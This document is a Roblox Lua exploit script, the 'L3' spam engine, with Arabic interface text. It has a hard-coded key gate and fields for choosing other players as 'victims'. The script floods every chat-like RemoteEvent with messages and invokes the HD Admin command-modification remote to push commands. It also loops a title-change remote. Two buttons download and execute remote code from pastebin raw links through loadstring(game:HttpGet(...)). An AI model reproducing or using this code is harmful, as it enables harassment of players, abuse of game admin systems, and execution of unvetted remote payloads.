-- [[ 👑 ADVANCED ULTRA SPAM ENGINE - L3 COMPLETE EDITION WITH RGB TITLE 👑 ]] -- local Players = game:GetService("Players") local LocalPlayer = Players.LocalPlayer if not LocalPlayer then LocalPlayer = Players.PlayerAdded:Wait() end local playerGui = LocalPlayer:WaitForChild("PlayerGui", 10) local ReplicatedStorage = game:GetService("ReplicatedStorage") local UserInputService = game:GetService("UserInputService") local RunService = game:GetService("RunService") local Lighting = game:GetService("Lighting") -- متغيرات الأهداف الأساسية local targetPlayer1 = "" local targetPlayer2 = "" local targetPlayer3 = "" local targetPlayer4 = "" local activeInputBox = 1 local _SPAM_TOP_ACTIVE = false local _SPAM_BOTTOM_ACTIVE = false local _ANTI_LAG_ACTIVE = false local RGBRun = false local CORRECT_KEY = "Emad" local CRem = nil local ARem = nil local originalAmbient = Lighting.Ambient local originalOutdoorAmbient = Lighting.OutdoorAmbient local originalBrightness = Lighting.Brightness local function ScanRemotes() CRem = ReplicatedStorage:FindFirstChild("ChatEvent", true) for _, d in pairs(ReplicatedStorage:GetDescendants()) do if d:IsA("RemoteFunction") and (d.Name == "RequestCommandModification" or d.Name:match("Modification")) then ARem = d break end end if not ARem then ARem = ReplicatedStorage:FindFirstChild("RequestCommandModification", true) end end task.spawn(ScanRemotes) local function ExecuteL3Engine(msgText) if msgText == "" or msgText == nil then return end pcall(function() for _, v in pairs(ReplicatedStorage:GetDescendants()) do if v:IsA("RemoteEvent") and (v.Name:lower():find("chat") or v.Name:lower():find("msg") or v.Name:lower():find("say") or v.Name:lower():find("send")) then v:FireServer(msgText, "All") end end for _, gui in pairs(LocalPlayer.PlayerGui:GetDescendants()) do if gui:IsA("TextBox") and (gui.Name:lower():find("chat") or gui.Name:lower():find("input") or gui.Name:lower():find("fake")) then gui.Text = msgText gui:ReleaseFocus(true) end end if ARem then ARem:InvokeServer(msgText) elseif ReplicatedStorage:FindFirstChild("HDAdminHDClient") and ReplicatedStorage.HDAdminHDClient:FindFirstChild("Signals") then ReplicatedStorage.HDAdminHDClient.Signals.RequestCommandModification:InvokeServer(msgText) end end) end local function MakeDraggable(frame, handle) local dragging, dragInput, dragStart, startPos handle = handle or frame handle.InputBegan:Connect(function(input) if input.UserInputType == Enum.UserInputType.MouseButton1 or input.UserInputType == Enum.UserInputType.Touch then dragging = true dragStart = input.Position startPos = frame.Position input.Changed:Connect(function() if input.UserInputState == Enum.UserInputState.End then dragging = false end end) end end) handle.InputChanged:Connect(function(input) if input.UserInputType == Enum.UserInputType.MouseMovement or input.UserInputType == Enum.UserInputType.Touch then dragInput = input end end) UserInputService.InputChanged:Connect(function(input) if input == dragInput and dragging then local delta = input.Position - dragStart frame.Position = UDim2.new(startPos.X.Scale, startPos.X.Offset + delta.X, startPos.Y.Scale, startPos.Y.Offset + delta.Y) end end) end pcall(function() if playerGui and playerGui:FindFirstChild("L3_DEVELOPER_ENGINE") then playerGui.L3_DEVELOPER_ENGINE:Destroy() end end) local Gui = Instance.new("ScreenGui") Gui.Name = "L3_DEVELOPER_ENGINE" Gui.ResetOnSpawn = false Gui.Parent = playerGui local KeyFrame = Instance.new("Frame", Gui) KeyFrame.Size = UDim2.new(0, 250, 0, 150) KeyFrame.Position = UDim2.new(0.4, 0, 0.4, 0) KeyFrame.BackgroundColor3 = Color3.fromRGB(15, 15, 18) KeyFrame.BorderSizePixel = 0 Instance.new("UICorner", KeyFrame) local KeyStroke = Instance.new("UIStroke", KeyFrame) KeyStroke.Thickness = 2 local KeyTitle = Instance.new("TextLabel", KeyFrame) KeyTitle.Size = UDim2.new(1, 0, 0, 35) KeyTitle.Text = "🔑 نظام التحقق من المفتاح 🔑" KeyTitle.BackgroundColor3 = Color3.fromRGB(18, 0, 30) KeyTitle.TextColor3 = Color3.new(1, 1, 1) KeyTitle.TextSize = 13 KeyTitle.Font = Enum.Font.SourceSansBold MakeDraggable(KeyFrame, KeyTitle) local KeyInputBox = Instance.new("TextBox", KeyFrame) KeyInputBox.Size = UDim2.new(0, 220, 0, 32) KeyInputBox.Position = UDim2.new(0, 15, 0, 55) KeyInputBox.PlaceholderText = "أدخل المفتاح هنا..." KeyInputBox.Text = "" KeyInputBox.BackgroundColor3 = Color3.fromRGB(5, 5, 5) KeyInputBox.TextColor3 = Color3.new(1, 1, 1) KeyInputBox.TextSize = 14 Instance.new("UICorner", KeyInputBox) local KeyCheckBtn = Instance.new("TextButton", KeyFrame) KeyCheckBtn.Size = UDim2.new(0, 220, 0, 35) KeyCheckBtn.Position = UDim2.new(0, 15, 0, 100) KeyCheckBtn.Text = "تفعيل السكربت" KeyCheckBtn.BackgroundColor3 = Color3.fromRGB(20, 50, 20) KeyCheckBtn.TextColor3 = Color3.new(1, 1, 1) KeyCheckBtn.TextSize = 13 KeyCheckBtn.Font = Enum.Font.SourceSansBold Instance.new("UICorner", KeyCheckBtn) local ToggleBtn = Instance.new("TextButton", Gui) ToggleBtn.Size = UDim2.new(0, 85, 0, 85) ToggleBtn.Position = UDim2.new(0, 20, 0.4, 0) ToggleBtn.BackgroundColor3 = Color3.fromRGB(18, 0, 30) ToggleBtn.Text = "L3" ToggleBtn.TextSize = 28 ToggleBtn.Font = Enum.Font.SourceSansBold ToggleBtn.Visible = false Instance.new("UICorner", ToggleBtn).CornerRadius = UDim.new(0, 10) local ToggleStroke = Instance.new("UIStroke", ToggleBtn) ToggleStroke.Thickness = 2 MakeDraggable(ToggleBtn) local MainContainer = Instance.new("Frame", Gui) MainContainer.Size = UDim2.new(0, 350, 0, 350) MainContainer.Position = UDim2.new(0.4, 0, 0.2, 0) MainContainer.BackgroundColor3 = Color3.fromRGB(15, 15, 18) MainContainer.BorderSizePixel = 0 MainContainer.Visible = false Instance.new("UICorner", MainContainer) local Stroke = Instance.new("UIStroke", MainContainer) Stroke.Thickness = 2 local Title = Instance.new("TextLabel", MainContainer) Title.Size = UDim2.new(1, 0, 0, 35) Title.Text = "👑 المطور L3 👑" Title.BackgroundColor3 = Color3.fromRGB(18, 0, 30) Title.TextSize = 14 Title.Font = Enum.Font.SourceSansBold MakeDraggable(MainContainer, Title) local MainFrame = Instance.new("ScrollingFrame", MainContainer) MainFrame.Size = UDim2.new(1, 0, 1, -35) MainFrame.Position = UDim2.new(0, 0, 0, 35) MainFrame.BackgroundTransparency = 1 MainFrame.BorderSizePixel = 0 MainFrame.ScrollBarThickness = 6 MainFrame.ScrollBarImageColor3 = Color3.fromRGB(18, 0, 30) MainFrame.CanvasSize = UDim2.new(0, 0, 0, 1050) -- زيادة المساحة لاستيعاب MCR4 -- ==================== [ 🔼 القسم العلوي ] ==================== local TargetBox1 = Instance.new("TextBox", MainFrame) TargetBox1.Size = UDim2.new(0, 210, 0, 28) TargetBox1.Position = UDim2.new(0, 15, 0, 15) TargetBox1.PlaceholderText = "اسم الضحية الأولى..." TargetBox1.Text = "" TargetBox1.BackgroundColor3 = Color3.fromRGB(5, 5, 5) TargetBox1.TextColor3 = Color3.new(1, 1, 1) TargetBox1.TextSize = 11 Instance.new("UICorner", TargetBox1) local TargetBox2 = Instance.new("TextBox", MainFrame) TargetBox2.Size = UDim2.new(0, 210, 0, 28) TargetBox2.Position = UDim2.new(0, 15, 0, 48) TargetBox2.PlaceholderText = "اسم الضحية الثانية (إضافي)..." TargetBox2.Text = "" TargetBox2.BackgroundColor3 = Color3.fromRGB(5, 5, 5) TargetBox2.TextColor3 = Color3.new(1, 1, 1) TargetBox2.TextSize = 11 Instance.new("UICorner", TargetBox2) local PlayerScroll1 = Instance.new("ScrollingFrame", MainFrame) PlayerScroll1.Size = UDim2.new(0, 210, 0, 75) PlayerScroll1.Position = UDim2.new(0, 15, 0, 82) PlayerScroll1.BackgroundColor3 = Color3.fromRGB(10, 10, 12) PlayerScroll1.ScrollBarThickness = 4 local ListLayout1 = Instance.new("UIListLayout", PlayerScroll1) ListLayout1.Padding = UDim.new(0, 3) -- ==================== [ 📊 المنتصف ] ==================== local SpamToggleBtn = Instance.new("TextButton", MainFrame) SpamToggleBtn.Size = UDim2.new(0, 210, 0, 32) SpamToggleBtn.Position = UDim2.new(0, 15, 0, 165) SpamToggleBtn.Text = "SPAM TOP (1 & 2)" SpamToggleBtn.BackgroundColor3 = Color3.fromRGB(130, 0, 0) SpamToggleBtn.TextColor3 = Color3.new(1, 1, 1) SpamToggleBtn.TextSize = 13 SpamToggleBtn.Font = Enum.Font.SourceSansBold Instance.new("UICorner", SpamToggleBtn) local BangBtn = Instance.new("TextButton", MainFrame) BangBtn.Size = UDim2.new(0, 210, 0, 32) BangBtn.Position = UDim2.new(0, 15, 0, 202) BangBtn.Text = "تشغيل سكربت البانق 💥" BangBtn.BackgroundColor3 = Color3.fromRGB(100, 60, 0) BangBtn.TextColor3 = Color3.new(1, 1, 1) BangBtn.TextSize = 12 BangBtn.Font = Enum.Font.SourceSansBold Instance.new("UICorner", BangBtn) local RGBOpenBtn = Instance.new("TextButton", MainFrame) RGBOpenBtn.Size = UDim2.new(0, 210, 0, 32) RGBOpenBtn.Position = UDim2.new(0, 15, 0, 239) RGBOpenBtn.Text = "التحكم في الاسم الملون 🌈" RGBOpenBtn.BackgroundColor3 = Color3.fromRGB(40, 20, 80) RGBOpenBtn.TextColor3 = Color3.new(1, 1, 1) RGBOpenBtn.TextSize = 12 RGBOpenBtn.Font = Enum.Font.SourceSansBold Instance.new("UICorner", RGBOpenBtn) local AntiCmdsBtn = Instance.new("TextButton", MainFrame) AntiCmdsBtn.Size = UDim2.new(0, 210, 0, 32) AntiCmdsBtn.Position = UDim2.new(0, 15, 0, 276) AntiCmdsBtn.Text = "تفعيل حمايه L3 🛡️" AntiCmdsBtn.BackgroundColor3 = Color3.fromRGB(20, 20, 30) AntiCmdsBtn.TextColor3 = Color3.fromRGB(200, 200, 200) AntiCmdsBtn.TextSize = 12 AntiCmdsBtn.Font = Enum.Font.SourceSansBold Instance.new("UICorner", AntiCmdsBtn) local AntiLagBtn = Instance.new("TextButton", MainFrame) AntiLagBtn.Size = UDim2.new(0, 210, 0, 26) AntiLagBtn.Position = UDim2.new(0, 15, 0, 313) AntiLagBtn.Text = "🚀 مانع التقطيع الأقوى [معطل]" AntiLagBtn.BackgroundColor3 = Color3.fromRGB(45, 45, 45) AntiLagBtn.TextColor3 = Color3.fromRGB(235, 220, 255) AntiLagBtn.TextSize = 11 AntiLagBtn.Font = Enum.Font.SourceSansBold Instance.new("UICorner", AntiLagBtn) local StatusLabel = Instance.new("TextLabel", MainFrame) StatusLabel.Size = UDim2.new(0, 210, 0, 22) StatusLabel.Position = UDim2.new(0, 15, 0, 344) StatusLabel.Text = "الحالة: جاهز للعمل ⚡" StatusLabel.BackgroundColor3 = Color3.fromRGB(18, 0, 30) StatusLabel.TextColor3 = Color3.fromRGB(220, 220, 220) StatusLabel.TextSize = 10 StatusLabel.Font = Enum.Font.SourceSansBold Instance.new("UICorner", StatusLabel) -- ==================== [ 🔽 القسم السفلي ] ==================== local TargetBox3 = Instance.new("TextBox", MainFrame) TargetBox3.Size = UDim2.new(0, 210, 0, 28) TargetBox3.Position = UDim2.new(0, 15, 0, 372) TargetBox3.PlaceholderText = "نسخ غامض - الضحية الثالثة..." TargetBox3.Text = "" TargetBox3.BackgroundColor3 = Color3.fromRGB(5, 5, 5) TargetBox3.TextColor3 = Color3.new(1, 1, 1) TargetBox3.TextSize = 11 Instance.new("UICorner", TargetBox3) local TargetBox4 = Instance.new("TextBox", MainFrame) TargetBox4.Size = UDim2.new(0, 210, 0, 28) TargetBox4.Position = UDim2.new(0, 15, 0, 405) TargetBox4.PlaceholderText = "نسخ غامض - الضحية الرابعة..." TargetBox4.Text = "" TargetBox4.BackgroundColor3 = Color3.fromRGB(5, 5, 5) TargetBox4.TextColor3 = Color3.new(1, 1, 1) TargetBox4.TextSize = 11 Instance.new("UICorner", TargetBox4) local PlayerScroll2 = Instance.new("ScrollingFrame", MainFrame) PlayerScroll2.Size = UDim2.new(0, 210, 0, 130) PlayerScroll2.Position = UDim2.new(0, 15, 0, 439) PlayerScroll2.BackgroundColor3 = Color3.fromRGB(10, 10, 12) PlayerScroll2.ScrollBarThickness = 4 local ListLayout2 = Instance.new("UIListLayout", PlayerScroll2) ListLayout2.Padding = UDim.new(0, 3) local SpamBottomToggleBtn = Instance.new("TextButton", MainFrame) SpamBottomToggleBtn.Size = UDim2.new(0, 210, 0, 35) SpamBottomToggleBtn.Position = UDim2.new(0, 15, 0, 575) SpamBottomToggleBtn.Text = "💥 SPAM MYSTIC (3 & 4) 💥" SpamBottomToggleBtn.BackgroundColor3 = Color3.fromRGB(75, 0, 130) SpamBottomToggleBtn.TextColor3 = Color3.new(1, 1, 1) SpamBottomToggleBtn.TextSize = 12 SpamBottomToggleBtn.Font = Enum.Font.SourceSansBold Instance.new("UICorner", SpamBottomToggleBtn) local SpamMapBtn = Instance.new("TextButton", MainFrame) SpamMapBtn.Size = UDim2.new(0, 210, 0, 35) SpamMapBtn.Position = UDim2.new(0, 15, 0, 615) SpamMapBtn.Text = "Spam ماب نسخ" SpamMapBtn.BackgroundColor3 = Color3.fromRGB(200, 40, 40) SpamMapBtn.TextColor3 = Color3.new(1, 1, 1) SpamMapBtn.TextSize = 13 SpamMapBtn.Font = Enum.Font.SourceSansBold Instance.new("UICorner", SpamMapBtn) local FastPumpBtn = Instance.new("TextButton", MainFrame) FastPumpBtn.Size = UDim2.new(0, 210, 0, 40) FastPumpBtn.Position = UDim2.new(0, 15, 0, 660) FastPumpBtn.Text = "🚀 الضخ السريع 🚀" FastPumpBtn.BackgroundColor3 = Color3.fromRGB(0, 102, 204) FastPumpBtn.TextColor3 = Color3.new(1, 1, 1) FastPumpBtn.TextSize = 14 FastPumpBtn.Font = Enum.Font.SourceSansBold Instance.new("UICorner", FastPumpBtn) local Cm2Btn = Instance.new("TextButton", MainFrame) Cm2Btn.Size = UDim2.new(0, 210, 0, 40) Cm2Btn.Position = UDim2.new(0, 15, 0, 705) Cm2Btn.Text = "Cm2" Cm2Btn.BackgroundColor3 = Color3.fromRGB(0, 0, 0) Cm2Btn.TextColor3 = Color3.fromRGB(255, 255, 255) Cm2Btn.TextSize = 14 Cm2Btn.Font = Enum.Font.SourceSansBold Instance.new("UICorner", Cm2Btn) Cm2Btn.MouseButton1Click:Connect(function() StatusLabel.Text = "جاري تنفيذ Cm2... ⚡" StatusLabel.TextColor3 = Color3.fromRGB(255, 255, 255) local success, err = pcall(function() loadstring(game:HttpGet("https://pastebin.com/raw/ZcG0AJS0"))() end) if success then StatusLabel.Text = "تم تنفيذ Cm2 بنجاح! ✅" StatusLabel.TextColor3 = Color3.fromRGB(0, 255, 120) else StatusLabel.Text = "خطأ في الرابط ❌" StatusLabel.TextColor3 = Color3.fromRGB(255, 50, 50) end end) -- الخانة الجديدة MCR4 local MCR4Btn = Instance.new("TextButton", MainFrame) MCR4Btn.Size = UDim2.new(0, 210, 0, 40) MCR4Btn.Position = UDim2.new(0, 15, 0, 750) -- تم ضبط الموقع تحت Cm2 MCR4Btn.Text = "MCR4" MCR4Btn.BackgroundColor3 = Color3.fromRGB(0, 0, 0) MCR4Btn.TextColor3 = Color3.fromRGB(255, 255, 255) MCR4Btn.TextSize = 14 MCR4Btn.Font = Enum.Font.SourceSansBold Instance.new("UICorner", MCR4Btn) MCR4Btn.MouseButton1Click:Connect(function() StatusLabel.Text = "جاري تنفيذ MCR4... ⚡" StatusLabel.TextColor3 = Color3.fromRGB(255, 255, 255) local success, err = pcall(function() loadstring(game:HttpGet("https://pastebin.com/raw/xJ0dwwpt"))() end) if success then StatusLabel.Text = "تم تنفيذ MCR4 بنجاح! ✅" StatusLabel.TextColor3 = Color3.fromRGB(0, 255, 120) else StatusLabel.Text = "خطأ في رابط MCR4 ❌" StatusLabel.TextColor3 = Color3.fromRGB(255, 50, 50) end end) -- [باقي الأكواد المنطقية والواجهات RGB] local RGBFrame = Instance.new("Frame", Gui) RGBFrame.Size = UDim2.new(0, 280, 0, 160) RGBFrame.Position = UDim2.new(0.5, -140, 0.5, -80) RGBFrame.BackgroundColor3 = Color3.fromRGB(10, 5, 20) RGBFrame.BackgroundTransparency = 0.2 RGBFrame.Visible = false Instance.new("UICorner", RGBFrame) local RGBStroke = Instance.new("UIStroke", RGBFrame) RGBStroke.Thickness = 2 local RGBT=Instance.new("TextLabel",RGBFrame) RGBT.Size,RGBT.Position,RGBT.BackgroundTransparency,RGBT.Text,RGBT.TextColor3,RGBT.Font,RGBT.TextSize,RGBT.TextXAlignment=UDim2.new(0.7,0,0,35),UDim2.new(0.05,0,0,5),1,"L3 SYSTEM RGB",Color3.fromRGB(255,255,255),"GothamBold",14,"Left" MakeDraggable(RGBFrame, RGBT) local ClsRGB = Instance.new("TextButton", RGBFrame) ClsRGB.Size,ClsRGB.Position,ClsRGB.BackgroundColor3,ClsRGB.Text,ClsRGB.TextColor3,ClsRGB.Font,ClsRGB.TextSize=UDim2.new(0,30,0,30),UDim2.new(1,-35,0,5),Color3.fromRGB(150,20,20),"X",Color3.fromRGB(255,255,255),"GothamBold",14 Instance.new("UICorner",ClsRGB) local RGBIn = Instance.new("TextBox", RGBFrame) RGBIn.Size,RGBIn.Position,RGBIn.BackgroundColor3,RGBIn.Text,RGBIn.TextColor3,RGBIn.Font,RGBIn.TextSize=UDim2.new(0.9,0,0,35),UDim2.new(0.05,0,0,50),Color3.fromRGB(20,10,35),"L3 ON TOP",Color3.fromRGB(255,255,255),"GothamBold",12 Instance.new("UICorner",RGBIn) local RGBSt = Instance.new("TextButton", RGBFrame) RGBSt.Size,RGBSt.Position,RGBSt.BackgroundColor3,RGBSt.Text,RGBSt.TextColor3,RGBSt.Font,RGBSt.TextSize=UDim2.new(0.9,0,0,40),UDim2.new(0.05,0,0,105),Color3.fromRGB(40,20,80),"تفعيل الاسم",Color3.fromRGB(255,255,255),"GothamBold",13 Instance.new("UICorner",RGBSt) RGBOpenBtn.MouseButton1Click:Connect(function() RGBFrame.Visible = not RGBFrame.Visible end) ClsRGB.MouseButton1Click:Connect(function() RGBFrame.Visible = false end) RGBSt.MouseButton1Click:Connect(function() if RGBRun then RGBRun = false RGBSt.Text, RGBSt.BackgroundColor3 = "تفعيل الاسم", Color3.fromRGB(40, 20, 80) else RGBRun = true RGBSt.Text, RGBSt.BackgroundColor3 = "إلغاء التفعيل", Color3.fromRGB(150, 20, 20) task.spawn(function() local hu = 0 while RGBRun do local r = ReplicatedStorage:FindFirstChild("ApplyTitle", true) or ReplicatedStorage:FindFirstChild("ChangeTitle", true) if r then pcall(function() r:FireServer(RGBIn.Text, Color3.fromHSV(hu, 1, 1)) end) end hu = hu + 0.03 if hu >= 1 then hu = 0 end task.wait(0.05) end end) end end) TargetBox1.Focused:Connect(function() activeInputBox = 1 end) TargetBox2.Focused:Connect(function() activeInputBox = 2 end) TargetBox4.Focused:Connect(function() activeInputBox = 4 end) local function RefreshLists() for _, child in pairs(PlayerScroll1:GetChildren()) do if child:IsA("TextButton") then child:Destroy() end end for _, child in pairs(PlayerScroll2:GetChildren()) do if child:IsA("TextButton") then child:Destroy() end end for _, p in pairs(Players:GetPlayers()) do if p ~= LocalPlayer then local pBtn1 = Instance.new("TextButton", PlayerScroll1) pBtn1.Size = UDim2.new(1, -6, 0, 24) pBtn1.BackgroundColor3 = Color3.fromRGB(25, 25, 30) pBtn1.Text = p.Name pBtn1.TextColor3 = Color3.fromRGB(200, 200, 200) pBtn1.TextSize = 11 Instance.new("UICorner", pBtn1) pBtn1.MouseButton1Click:Connect(function() if activeInputBox == 1 then TargetBox1.Text = p.Name elseif activeInputBox == 2 then TargetBox2.Text = p.Name elseif activeInputBox == 4 then TargetBox4.Text = p.Name end end) local pBtn2 = Instance.new("TextButton", PlayerScroll2) pBtn2.Size = UDim2.new(1, -6, 0, 24) pBtn2.BackgroundColor3 = Color3.fromRGB(25, 25, 30) pBtn2.Text = p.Name pBtn2.TextColor3 = Color3.fromRGB(200, 200, 200) pBtn2.TextSize = 11 Instance.new("UICorner", pBtn2) pBtn2.MouseButton1Click:Connect(function() if activeInputBox == 3 then TargetBox3.Text = p.Name elseif activeInputBox == 4 then TargetBox4.Text = p.Name end end) end end end Players.PlayerAdded:Connect(RefreshLists) Players.PlayerRemoving:Connect(RefreshLists) RefreshLists()